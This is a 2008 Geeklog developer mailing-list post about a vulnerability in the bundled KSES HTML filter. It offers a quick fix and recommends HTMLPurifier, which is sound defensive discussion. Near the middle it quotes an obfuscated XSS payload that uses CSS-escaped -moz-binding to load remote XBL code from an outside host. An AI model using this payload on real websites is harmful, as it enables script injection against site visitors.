[geeklog-devel] KSES Vulnerability in 1.4.1/1.40sr6

Mark Howard mark at the-howards.net
Sat Apr 26 11:52:49 EDT 2008


Tap .. tap..  is this thing on?  :^)

OK, so I have confirmed, this can be exploited in the KSES class included
with 1.4.1.  

I know your instructions ask that an exploit be included; however it is not
my practice to share exploits of my own creation. The advisory lists a few
examples:

http://seclists.org/bugtraq/2008/Apr/0028.html

Here is the quick-fix, implemented in the class as recommended in the
advisory, and it seems to work (my exploit now fails) but would appreciate
it if others could test/validate.

http://the-howards.net/kses.class.zip

Note that this fix only prevents PHP code execution when kses is called
without previous entities normalization and also bypass of protocol check,
it does not deal with XSS attacks originating from exploits via CSS style
directives, eg:

(Firefox) <a style=" ;\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67:
\75\72\6c(\68\74\74\70\3a\2F\2F\68\61\2E\63\6B\65\72\73\2E\6F&#9
2;72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C\23\78\73\73)"
href="http://example.com">test</a>

Only a more robust/supported solution such as HTMLpurifier would represent a
best-effort fix for such a thing.  Still, perhaps this merits a
notification/fixpack containing the quick-fix to 1.4.1 users, you don't have
to say it's a complete solution.

If I get real ambitious over the weekend, I'll have a crack at modifying the
kses class to utilize the htmlpurifier wrapper, thus making it a
comprehensive drop-in fix for 1.4.1, while also permitting direct use of the
HTMLpurifier class for new code.

In case someone else has more time than I, here is the link to the wrapper
again:

http://htmlpurifier.org/svnroot/htmlpurifier/trunk/library/HTMLPurifier.kses
.php

My good deed for the day.

-m






More information about the geeklog-devel mailing list